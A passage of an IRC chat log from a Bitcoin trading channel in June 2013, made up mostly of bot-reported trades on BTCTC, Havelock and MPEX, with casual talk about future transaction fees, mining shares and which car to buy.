mining business, we have never seen it as a drying up one in spite of persistent block halving. If Bitcoin ever rises as a successful currency in a few years, and the transaction fee has to be, say, 15BTC each block on average, to prevent attacks from organizations that are all over the world and begin show up when Bitcoin flourishes, what we could expect is 27.5BTC Jun 06 18:37:46 per block after the next block halving, and more than 15BTC forever in the further future." Jun 06 18:37:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.02495 = 0.3743 BTC [+] Jun 06 18:38:57 perhaps. Jun 06 18:39:11 [BTCTC] [S.DICE-PT] 14 @ 0.002503 = 0.035 BTC [-] Jun 06 18:39:16 yeah, FC can't really promise it going down like that Jun 06 18:39:19 but he has a point Jun 06 18:39:41 well atm the fees are cents Jun 06 18:39:49 going up to 1 full btc in 2 years i can see Jun 06 18:39:57 going to 15 i don't, but who's to know. Jun 06 18:40:44 my own estimates show a stablisation around 3 btc per. Jun 06 18:40:47 so in 3 more halvings Jun 06 18:41:31 in those estimations, what is BTC/USD? Jun 06 18:42:49 a few hundred Jun 06 18:43:28 [BTCTC] [BTC-GOLD] 4 @ 0.005305 = 0.0212 BTC [-] Jun 06 18:43:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] Jun 06 18:44:07 [BTCTC] [TAT.ASICMINER] 25 @ 0.02495 = 0.6238 BTC [+] Jun 06 18:48:24 [BTCTC] [BASIC-MINING] 32 @ 0.7099 = 22.7168 BTC [+] Jun 06 18:48:26 [BTCTC] [BASIC-MINING] 1 @ 0.7099 BTC [+] Jun 06 18:48:27 [BTCTC] [BASIC-MINING] 3 @ 0.71 = 2.13 BTC [+] Jun 06 18:52:19 [BTCTC] [ASICMINER-PT] 1 @ 2.492999 BTC [+] Jun 06 18:56:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 06 18:58:14 DIVIDEND: 115,000 shares were paid ฿0.00003223 each for TAT.VIRTUALMINE. Jun 06 18:59:59 [BTCTC] [TAT.ASICMINER] 11 @ 0.02509 = 0.276 BTC [+] Jun 06 19:00:20 eat some of Jutarul's Jun 06 19:00:24 I want that wall to go away! Jun 06 19:02:34 sell the farm Jun 06 19:03:31 Chaaaang-Noi: been smoking too much opium Jun 06 19:04:30 I dont want a farm Jun 06 19:04:39 I have 12 GPUs collecting dust as is Jun 06 19:04:40 ;;seen mircea_popescu Jun 06 19:04:42 got sick of it Jun 06 19:04:56 ;;gribble Jun 06 19:05:06 [BTCTC] [BASIC-MINING] 3 @ 0.71 = 2.13 BTC [+] Jun 06 19:05:09 mircea_popescu was last seen in #bitcoin-assets 22 minutes and 19 seconds ago: a few hundred Jun 06 19:05:11 yes I am gribble. why do you keep bothering me? Jun 06 19:07:39 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 06 19:07:56 ;;estimate Jun 06 19:07:56 Next difficulty estimate | 20049505.8364 based on data since last change | 19358174.1145 based on data for last three days Jun 06 19:08:23 ask coinlab Jun 06 19:09:20 [HAVELOCK] [ASICM] 4 @ 0.0251 = 0.1004 BTC [-] Jun 06 19:09:52 BTCUSD ticker | Best bid: 121.85001, Best ask: 121.88999, Bid-ask spread: 0.03998, Last trade: 121.85001, 24 hour volume: 14696.81436549, 24 hour low: 119.57000, 24 hour high: 123.50000, 24 hour vwap: 121.68697 Jun 06 19:10:53 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 19:12:29 [BTCTC] [PAJKA.BOND] 1 @ 0.099603 BTC [-] Jun 06 19:13:34 [BTCTC] [PAJKA.BOND] 2 @ 0.099602 = 0.1992 BTC [-] Jun 06 19:15:46 [BTCTC] [PAJKA.BOND] 3 @ 0.099 = 0.297 BTC [-] Jun 06 19:17:36 [BTCTC] [PAJKA.BOND] 1 @ 0.096 BTC [-] Jun 06 19:17:38 [BTCTC] [ASICMINER-PT] 2 @ 2.489 = 4.978 BTC [-] Jun 06 19:18:10 [BTCTC] [PAJKA.BOND] 1 @ 0.09501 BTC [-] Jun 06 19:18:14 [BTCTC] [TAT.ASICMINER] 22 @ 0.02509 = 0.552 BTC [+] Jun 06 19:18:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [+] Jun 06 19:18:58 [BTCTC] [PAJKA.BOND] 2 @ 0.095 = 0.19 BTC [-] Jun 06 19:19:20 meh get the de lorean instead Jun 06 19:19:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.02509 = 0.0753 BTC [+] Jun 06 19:20:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [+] Jun 06 19:22:26 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 19:24:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.02509 = 0.0502 BTC [+] Jun 06 19:26:46 [BTCTC] [COGNITIVE] 1 @ 0.27011 BTC [+] Jun 06 19:26:50 [BTCTC] [COGNITIVE] 2 @ 0.2701 = 0.5402 BTC [-] Jun 06 19:26:56 [BTCTC] [COGNITIVE] 2 @ 0.27002 = 0.54 BTC [-] Jun 06 19:27:26 [BTCTC] [BITVPS] 95 @ 0.0007 = 0.0665 BTC [-] Jun 06 19:27:43 [BTCTC] [BITVPS] 1 @ 0.0007 BTC [-] Jun 06 19:27:55 [BTCTC] [BITVPS] 79 @ 0.0007 = 0.0553 BTC [-] Jun 06 19:27:57 [BTCTC] [BTC-TRADING-PT] 1 @ 0.32 BTC [+] Jun 06 19:28:36 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [-] Jun 06 19:28:39 [BTCTC] [BTC-BOND] 7 @ 0.009997 = 0.07 BTC [-] Jun 06 19:29:00 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 19:29:21 [BTCTC] [TAT.ASICMINER] 76 @ 0.02509 = 1.9068 BTC [+] Jun 06 19:29:30 [BTCTC] [ASICMINER-PT] 2 @ 2.48999 = 4.98 BTC [+] Jun 06 19:30:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.02509 = 0.2258 BTC [+] Jun 06 19:31:19 lol Jun 06 19:32:19 [BTCTC] [BITVPS] 2 @ 0.000751 = 0.0015 BTC [+] Jun 06 19:32:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.02509 BTC [+] Jun 06 19:33:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] Jun 06 19:33:33 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [-] Jun 06 19:33:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [-] Jun 06 19:34:01 [BTCTC] [TAT.ASICMINER] 24 @ 0.02495 = 0.5988 BTC [-] Jun 06 19:34:03 [BTCTC] [TAT.ASICMINER] 23 @ 0.02495 = 0.5739 BTC [-] Jun 06 19:34:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 06 19:34:42 [HAVELOCK] [HIM] 4 @ 0.3189 = 1.2756 BTC [+] Jun 06 19:34:43 [BTCTC] [TAT.ASICMINER] 22 @ 0.02492 = 0.5482 BTC [-] Jun 06 19:35:11 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 19:35:19 [BTCTC] [TAT.ASICMINER] 25 @ 0.0251 = 0.6275 BTC [+] Jun 06 19:35:24 [BTCTC] [ASICMINER-PT] 1 @ 2.489 BTC [-] Jun 06 19:35:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [+] Jun 06 19:37:15 [BTCTC] [TAT.ASICMINER] 55 @ 0.0251 = 1.3805 BTC [+] Jun 06 19:38:36 [HAVELOCK] [VTX] 1 @ 0.421 BTC [-] Jun 06 19:38:39 [HAVELOCK] [HIM] 4 @ 0.319 = 1.276 BTC [+] Jun 06 19:38:46 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] Jun 06 19:39:28 Honestly , don't get a lambo - just going to be heartache for you Jun 06 19:39:38 too unreliable Jun 06 19:39:50 mechanical problems, even when new Jun 06 19:40:27 chaang - you ever had like a 750 rr? Jun 06 19:40:27 bike Jun 06 19:40:28 [BTCTC] [TAT.ASICMINER] 28 @ 0.02492 = 0.6978 BTC [-] Jun 06 19:40:48 the motors are tuned too much, then if you drive them a short while the plugs foul Jun 06 19:40:53 [BTCTC] [TAT.ASICMINER] 72 @ 0.0249 = 1.7928 BTC [-] Jun 06 19:40:59 causes lots of problems Jun 06 19:41:11 besides other problems Jun 06 19:41:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 06 19:41:41 a high end porsche will be much more relaible Jun 06 19:41:55 reliable Jun 06 19:41:55 [BTCTC] [ASICMINER-PT] 2 @ 2.489 = 4.978 BTC [-] Jun 06 19:42:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] Jun 06 19:42:26 [BTCTC] [ASICMINER-PT] 12 @ 2.48997 = 29.8796 BTC [+] Jun 06 19:42:37 even a Ferrari, but if you want to enjoy something and not have problems with it Jun 06 19:42:58 if you overclock a gpu too much, it stops working Jun 06 19:43:06 same with a engine Jun 06 19:43:13 [HAVELOCK] [VTX] 1 @ 0.42 BTC [-] Jun 06 19:43:15 [BTCTC] [ASICMINER-PT] 1 @ 2.48998 BTC [+] Jun 06 19:43:19 that is the problem Jun 06 19:43:29 it will fuck it up if you drive it slow Jun 06 19:43:59 !ticker h him Jun 06 19:44:01 [HAVELOCK:HIM] 1D: 0.29600000 / 0.30014949 / 0.31900000 (156 shares, 46.82332000 BTC), 7D: 0.24000000 / 0.27311364 / 0.31900000 (1716 shares, 468.66301000 BTC), 30D: 0.15251000 / 0.2307875 / 0.31900000 (7056 shares, 1628.43660100 BTC) Jun 06 19:44:15 does schumacher still call you when you buy a ferrari? Jun 06 19:44:16 if you want to get fast for a little while, just get an IMpreza Jun 06 19:44:22 go with a more mainstream car, that is still really badass. I promise you- you will be much happier Jun 06 19:44:25 it probably won't break down before you leave the states Jun 06 19:44:53 [HAVELOCK] [ASICM] 16 @ 0.0251 = 0.4016 BTC [-] Jun 06 19:44:59 The new Jags are kind of nice, and don't seem to break down like the old ones. Jun 06 19:45:03 fast too Jun 06 19:46:03 oh ya. Jun 06 19:46:04 http://www.jaguarusa.com/models/xf/sports-sedan/ Jun 06 19:46:09 reasonable AND fast Jun 06 19:46:28 They are much much better. I would actually buy one and not be pissed about it Jun 06 19:46:32 or you could double your cash input and go here http://www.jaguarusa.com/models/xk/luxury-convertible-coupes/ Jun 06 19:48:01 Actually - I would reccomend a R8 or Porsche Jun 06 19:48:14 talking from real world knowledge here Jun 06 19:48:33 fuck Nascar that is only for hillbillys Jun 06 19:48:37 F1 Jun 06 19:49:29 American people, we are not most Jun 06 19:55:46 just big and slow, but very well built Jun 06 19:55:46 diesel easy to maintain as long as you can afford it Jun 06 19:55:46 whick you can Jun 06 19:56:15 yes but you can't park it anywhere but a lot. Jun 06 19:56:31 and if get anything besides the original hummer, I hate you. Jun 06 19:56:49 Well in Texas you can park anywhere, but IDK where he is Jun 06 19:56:55 [BTCTC] [TAT.ASICMINER] 27 @ 0.0249 = 0.6723 BTC [-] Jun 06 19:56:57 [BTCTC] [TAT.ASICMINER] 12 @ 0.0249 = 0.2988 BTC [-] Jun 06 19:57:06 true, he could park on top of a prius Jun 06 19:57:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.024801 = 0.248 BTC [-] Jun 06 19:59:57 [BTCTC] [ASICMINER-PT] 1 @ 2.492989 BTC [+] Jun 06 20:03:28 [HAVELOCK] [ASICM] 2 @ 0.0249901 = 0.05 BTC [-] Jun 06 20:03:30 [HAVELOCK] [ASICM] 70 @ 0.02499001 = 1.7493 BTC [-] Jun 06 20:03:31 [HAVELOCK] [ASICM] 28 @ 0.02499 = 0.6997 BTC [-] Jun 06 20:05:18 [HAVELOCK] [ASICM] 100 @ 0.0251 = 2.51 BTC [+] Jun 06 20:06:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.0251 = 0.2008 BTC [+] Jun 06 20:06:13 [HAVELOCK] [ASICM] 100 @ 0.02495 = 2.495 BTC [-] Jun 06 20:08:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.0251 = 0.1506 BTC [+] Jun 06 20:14:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0251 = 0.1004 BTC [+] Jun 06 20:15:05 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [-] Jun 06 20:16:30 [BTCTC] [TAT.ASICMINER] 30 @ 0.0251 = 0.753 BTC [+] Jun 06 20:16:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.0251 = 0.251 BTC [+] Jun 06 20:16:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 06 20:17:49 [MPEX] [S.MPOE] 9050 @ 0.00073886 = 6.6867 BTC [-] Jun 06 20:19:28 [BTCTC] [TAT.ASICMINER] 19 @ 0.024802 = 0.4712 BTC [-] Jun 06 20:20:18 [BTCTC] [ASICMINER-PT] 4 @ 2.492989 = 9.972 BTC [+] Jun 06 20:20:20 [BTCTC] [ASICMINER-PT] 2 @ 2.49299 = 4.986 BTC [+] Jun 06 20:21:10 Look, if you want to be pimp and comfy - a Escalade < We have a whole fleet Jun 06 20:21:49 Won't break the bank, warranty available all over Jun 06 20:21:59 umm $75 Jun 06 20:22:20 maybe 70 Jun 06 20:22:27 after ttl 75 Jun 06 20:24:52 That is what El Patron likes , so we have them Jun 06 20:25:31 the pimp Jun 06 20:25:32 yeah I think low 70k , after ttl $75 Jun 06 20:25:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [+] Jun 06 20:25:55 family business, El Patron loves Caddy Jun 06 20:26:00 yes Jun 06 20:26:06 tax title lic Jun 06 20:27:11 Don't get the ESV, way too big Jun 06 20:27:24 just the regular Escalade is big enough Jun 06 20:27:36 unless you need a bunch of room Jun 06 20:27:58 like you have 8 kids Jun 06 20:28:42 Well, that is a personal choice. Not really a wrong one Jun 06 20:29:02 If you are going oon a trip with kiddos, the bigger one would be better Jun 06 20:29:22 [HAVELOCK] [HIM] 22 @ 0.31899 = 7.0178 BTC [-] Jun 06 20:29:24 [HAVELOCK] [HIM] 81 @ 0.319 = 25.839 BTC [+] Jun 06 20:30:14 [BTCTC] [ASICMINER-PT] 5 @ 2.49299 = 12.465 BTC [+] Jun 06 20:30:25 yes it does Jun 06 20:30:46 and it comes out, I have not had mine in in years Jun 06 20:31:05 hold 7 Jun 06 20:31:06 ;;title http://bgr.com/2013/06/05/comcast-executive-google-fiber-criticism/ Jun 06 20:31:07 Error: This url is not on the whitelist. Jun 06 20:31:13 Comcast exec insists Americans don’t really need Google Fiber-like speeds Jun 06 20:31:33 2 buckets 2 buckets and a bench in the back Jun 06 20:31:48 [BTCTC] [TAT.ASICMINER] 36 @ 0.025148 = 0.9053 BTC [+] Jun 06 20:31:49 [BTCTC] [ASICMINER-PT] 4 @ 2.49299 = 9.972 BTC [+] Jun 06 20:31:51 [BTCTC] [ASICMINER-PT] 2 @ 2.493 = 4.986 BTC [+] Jun 06 20:31:55 [BTCTC] [ASICMINER-PT] 14 @ 2.49879 = 34.9831 BTC [+] Jun 06 20:32:06 in the small one with the 3rd row seat in there is no room in the hatch though Jun 06 20:33:00 like 3 bags or groceries , that is about it Jun 06 20:33:12 [BTCTC] [ASICMINER-PT] 9 @ 2.49879 = 22.4891 BTC [+] Jun 06 20:33:45 [BTCTC] [PAJKA.BOND] 1 @ 0.08 BTC [-] Jun 06 20:34:01 [BTCTC] [ASICMINER-PT] 1 @ 2.49299 BTC [-] Jun 06 20:34:13 Hmm, don't think so Jun 06 20:34:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.025147 BTC [-] Jun 06 20:34:30 sure thing Jun 06 20:35:08 Mine has juice stains in the back seats anyway Jun 06 20:35:16 not man juice Jun 06 20:35:24 applejuice and koolaid Jun 06 20:36:36 [BTCTC] [ASICMINER-PT] 9 @ 2.4989 = 22.4901 BTC [+] Jun 06 20:41:17 yep Jun 06 20:45:34 [BTCTC] [TAT.ASICMINER] 100 @ 0.0251 = 2.51 BTC [-] Jun 06 20:48:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Jun 06 20:49:22 [BTCTC] [ASICMINER-PT] 16 @ 2.4989 = 39.9824 BTC [+] Jun 06 20:50:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Jun 06 20:50:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.0251 = 0.0753 BTC [-] Jun 06 20:54:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] Jun 06 20:54:47 [HAVELOCK] [HIM] 1 @ 0.318 BTC [-] Jun 06 20:55:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Jun 06 20:56:02 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [-] Jun 06 20:56:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 06 20:58:19 [BTCTC] [TAT.ASICMINER] 9 @ 0.0251 = 0.2259 BTC [+] Jun 06 20:59:21 [BTCTC] [TAT.ASICMINER] 30 @ 0.025 = 0.75 BTC [-] Jun 06 20:59:24 [BTCTC] [TAT.ASICMINER] 21 @ 0.02505 = 0.5261 BTC [+] Jun 06 21:00:20 [BTCTC] [ASICMINER-PT] 1 @ 2.4989 BTC [+] Jun 06 21:02:47 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [-] Jun 06 21:03:18 [BTCTC] [TAT.ASICMINER] 28 @ 0.025039 = 0.7011 BTC [-] Jun 06 21:03:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.025039 = 0.3756 BTC [-] Jun 06 21:05:16 [BTCTC] [S.BBET-PT] 1 @ 0.002184 BTC [+] Jun 06 21:05:17 [BTCTC] [S.BBET-PT] 4 @ 0.002184 = 0.0087 BTC [+] Jun 06 21:06:17 [HAVELOCK] [ASICM] 6 @ 0.02515 = 0.1509 BTC [+] Jun 06 21:06:18 [HAVELOCK] [ASICM] 34 @ 0.02519 = 0.8565 BTC [+] Jun 06 21:07:46 [HAVELOCK] [HIM] 4 @ 0.3 = 1.2 BTC [-] Jun 06 21:08:54 [HAVELOCK] [ASICM] 11 @ 0.02512 = 0.2763 BTC [-] Jun 06 21:08:56 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [+] Jun 06 21:10:19 [BTCTC] [BASIC-MINING] 5 @ 0.71 = 3.55 BTC [+] Jun 06 21:10:42 [BTCTC] [BTC-BOND] 35 @ 0.009998 = 0.3499 BTC [+] Jun 06 21:10:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.025036 BTC [-] Jun 06 21:11:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.025036 BTC [-] Jun 06 21:12:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.025036 = 0.0501 BTC [-] Jun 06 21:14:18 wow HIM Jun 06 21:14:36 Butterfly labs actually came through for them heh... Jun 06 21:14:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.025036 = 0.0501 BTC [-] Jun 06 21:15:36 BFL got them a unit? Jun 06 21:15:47 yea Jun 06 21:15:53 that's why the HIM price is rising Jun 06 21:16:49 [HAVELOCK] [HIM] 33 @ 0.3 = 9.9 BTC [-] Jun 06 21:17:01 [BTCTC] [B.YABMC] 4 @ 0.0166 = 0.0664 BTC [+] Jun 06 21:17:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.025035 = 0.1502 BTC [-] Jun 06 21:18:48 nice, thanks for the data! I did not know that, Haven't followed HIM at all. was interested to see what it would do though. Jun 06 21:23:30 [MPEX] [S.MPOE] 7700 @ 0.00073886 = 5.6892 BTC [-] Jun 06 21:24:38 [HAVELOCK] [HIM] 63 @ 0.3 = 18.9 BTC [-] Jun 06 21:26:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.025034 = 0.0751 BTC [-] Jun 06 21:27:19 [HAVELOCK] [ASICM] 6 @ 0.02512 = 0.1507 BTC [-] Jun 06 21:28:02 [HAVELOCK] [ASICM] 7 @ 0.02512 = 0.1758 BTC [-] Jun 06 21:28:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.025034 BTC [-] Jun 06 21:30:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.025 = 0.125 BTC [-] Jun 06 21:32:20 [BTCTC] [RSM] 10 @ 0.008544 = 0.0854 BTC [+] Jun 06 21:32:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.025033 = 0.1252 BTC [+] Jun 06 21:35:52 [MPEX] [S.MPOE] 19874 @ 0.00073886 = 14.6841 BTC [-] Jun 06 21:35:53 [MPEX] [S.MPOE] 8629 @ 0.00073785 = 6.3669 BTC [-] Jun 06 21:36:03 [MPEX] [S.MPOE] 1624 @ 0.00073779 = 1.1982 BTC [-] Jun 06 21:36:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] Jun 06 21:36:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.025033 BTC [+] Jun 06 21:36:33 question for you smart guys Jun 06 21:36:49 with the btctc api, orders are shown as markey buy or market sell Jun 06 21:37:03 which one would be a bid getting filled, adn which one an ask? Jun 06 21:37:14 im guessing a market buy would be an ask getting filled, yea? Jun 06 21:38:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] Jun 06 21:38:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] Jun 06 21:38:14 yea that would make sense Jun 06 21:39:51 [BTCTC] [TAT.ASICMINER] 19 @ 0.025 = 0.475 BTC [-] Jun 06 21:43:25 [BTCTC] [TAT.ASICMINER] 39 @ 0.025032 = 0.9762 BTC [+] Jun 06 21:43:39 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [-] Jun 06 21:44:25 [HAVELOCK] [ASICM] 2 @ 0.0249 = 0.0498 BTC [-] Jun 06 21:44:43 [BTCTC] [TAT.ASICMINER] 8 @ 0.025033 = 0.2003 BTC [+] Jun 06 21:48:48 !ticker h him Jun 06 21:48:50 [HAVELOCK:HIM] 1D: 0.29600000 / 0.30555028 / 0.31900000 (360 shares, 109.99810000 BTC), 7D: 0.24000000 / 0.27699885 / 0.31900000 (1920 shares, 531.83779000 BTC), 30D: 0.15251000 / 0.23300432 / 0.31900000 (7260 shares, 1691.61138100 BTC) Jun 06 21:51:53 [BTCTC] [BTC-BOND] 42 @ 0.009998 = 0.4199 BTC [+] Jun 06 21:58:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.025032 BTC [-] Jun 06 21:58:37 [MPEX] [S.MPOE] 15200 @ 0.00073779 = 11.2144 BTC [-] Jun 06 22:01:36 [BTCTC] [ASICMINER-PT] 1 @ 2.4989 BTC [+] Jun 06 22:03:05 [BTCTC] [COGNITIVE] 1 @ 0.279899 BTC [+] Jun 06 22:05:02 [HAVELOCK] [ASICM] 200 @ 0.02512 = 5.024 BTC [+] Jun 06 22:07:02 [HAVELOCK] [ASICM] 1 @ 0.02512 BTC [+] Jun 06 22:08:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4989 BTC [+] Jun 06 22:08:54 [BTCTC] [ASICMINER-PT] 2 @ 2.4989 = 4.9978 BTC [+] Jun 06 22:10:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [-] Jun 06 22:11:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.02483 = 0.1738 BTC [-] Jun 06 22:12:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.025033 = 0.2253 BTC [+] Jun 06 22:12:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.024826 = 0.0993 BTC [-] Jun 06 22:15:46 [HAVELOCK] [ASICM] 1 @ 0.02511 BTC [-] Jun 06 22:15:48 [BTCTC] [ASICMINER-PT] 1 @ 2.49899 BTC [+] Jun 06 22:15:56 [BTCTC] [ASICMINER-PT] 1 @ 2.49899 BTC [+] Jun 06 22:17:09 [HAVELOCK] [HIM] 10 @ 0.307 = 3.07 BTC [+] Jun 06 22:17:10 [HAVELOCK] [HIM] 10 @ 0.308 = 3.08 BTC [+] Jun 06 22:17:11 [HAVELOCK] [HIM] 10 @ 0.309 = 3.09 BTC [+] Jun 06 22:17:12 [HAVELOCK] [HIM] 10 @ 0.31 = 3.1 BTC [+] Jun 06 22:17:13 [HAVELOCK] [HIM] 10 @ 0.311 = 3.11 BTC [+] Jun 06 22:17:14 [HAVELOCK] [HIM] 10 @ 0.312 = 3.12 BTC [+] Jun 06 22:17:15 [HAVELOCK] [HIM] 10 @ 0.313 = 3.13 BTC [+] Jun 06 22:17:16 [HAVELOCK] [HIM] 10 @ 0.314 = 3.14 BTC [+] Jun 06 22:17:17 [HAVELOCK] [HIM] 10 @ 0.315 = 3.15 BTC [+] Jun 06 22:17:18 [HAVELOCK] [HIM] 10 @ 0.316 = 3.16 BTC [+] Jun 06 22:17:19 [HAVELOCK] [HIM] 10 @ 0.317 = 3.17 BTC [+] Jun 06 22:17:20 [HAVELOCK] [HIM] 15 @ 0.318 = 4.77 BTC [+] Jun 06 22:17:22 [BTCTC] [GSDPT] 3 @ 0.003098 = 0.0093 BTC [-] Jun 06 22:17:25 [BTCTC] [ASICMINER-PT] 8 @ 2.48802 = 19.9042 BTC [-] Jun 06 22:18:47 [BTCTC] [ASICMINER-PT] 1 @ 2.48801 BTC [-] Jun 06 22:19:20 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 06 22:19:23 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 06 22:19:55 [BTCTC] [ASICMINER-PT] 1 @ 2.48701 BTC [-] Jun 06 22:19:56 [BTCTC] [COGNITIVE] 3 @ 0.289895 = 0.8697 BTC [+] Jun 06 22:20:30 [BTCTC] [ASICMINER-PT] 3 @ 2.487 = 7.461 BTC [-] Jun 06 22:20:41 [BTCTC] [ASICMINER-PT] 5 @ 2.487 = 12.435 BTC [-] Jun 06 22:20:49 [HAVELOCK] [ASICM] 2 @ 0.02511 = 0.0502 BTC [-] Jun 06 22:21:04 https://bitcointalk.org/index.php?topic=226884.msg2393091#msg2393091 Jun 06 22:21:24 lame Jun 06 22:21:33 i like envato Jun 06 22:22:40 [HAVELOCK] [ASICM] 50 @ 0.02511 = 1.2555 BTC [-] Jun 06 22:24:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 22:28:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Jun 06 22:28:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.025 = 0.225 BTC [+] Jun 06 22:31:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] Jun 06 22:34:45 [BTCTC] [TAT.ASICMINER] 14 @ 0.02485 = 0.3479 BTC [-] Jun 06 22:35:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 06 22:37:17 https://bitcointalk.org/index.php?topic=224634.msg2393012#msg2393012 Jun 06 22:37:20 o,o Jun 06 22:39:54 [BTCTC] [BTC-GOLD] 4 @ 0.01023 = 0.0409 BTC [+] Jun 06 22:44:13 [BTCTC] [CRYPTO-TRADE] 2 @ 0.193999 = 0.388 BTC [+] Jun 06 22:45:27 [BTCTC] [ASICMINER-PT] 2 @ 2.4989 = 4.9978 BTC [+] Jun 06 22:46:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [+] Jun 06 22:47:21 [BTCTC] [COGNITIVE] 1 @ 0.289888 BTC [-] Jun 06 22:47:41 [HAVELOCK] [VTX] 1 @ 0.4152 BTC [-] Jun 06 22:47:47 The is of the when is all you really must reply Jun 06 22:48:03 [HAVELOCK] [ASICM] 8 @ 0.02511 = 0.2009 BTC [-] Jun 06 22:50:14 [MPEX] [S.DICE] 2000 @ 0.0022 = 4.4 BTC [+] Jun 06 22:50:51 [BTCTC] [ASICMINER-PT] 2 @ 2.4989 = 4.9978 BTC [+] Jun 06 22:50:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [+] Jun 06 22:51:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 06 22:53:10 [HAVELOCK] [HIM] 1 @ 0.318 BTC [+] Jun 06 22:53:25 [MPEX] [S.DICE] 1000 @ 0.00249791 = 2.4979 BTC [+] Jun 06 22:54:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [+] Jun 06 22:55:00 [BTCTC] [TAT.ASICMINER] 14 @ 0.025 = 0.35 BTC [+] Jun 06 22:56:17 [BTCTC] [TAT.ASICMINER] 39 @ 0.025 = 0.975 BTC [+] Jun 06 23:01:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.024826 BTC [-] Jun 06 23:02:38 [BTCTC] [TAT.ASICMINER] 7 @ 0.024826 = 0.1738 BTC [-] Jun 06 23:06:16 [BTCTC] [ASICMINER-PT] 2 @ 2.4989 = 4.9978 BTC [+] Jun 06 23:09:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.024825 = 0.0745 BTC [-] Jun 06 23:09:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024825 BTC [-] Jun 06 23:09:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.024825 BTC [-] Jun 06 23:09:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.024825 = 0.2483 BTC [-] Jun 06 23:10:43 [BTCTC] [ASICMINER-PT] 4 @ 2.4989 = 9.9956 BTC [+] Jun 06 23:13:02 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [-] Jun 06 23:13:07 [BTCTC] [TAT.ASICMINER] 1 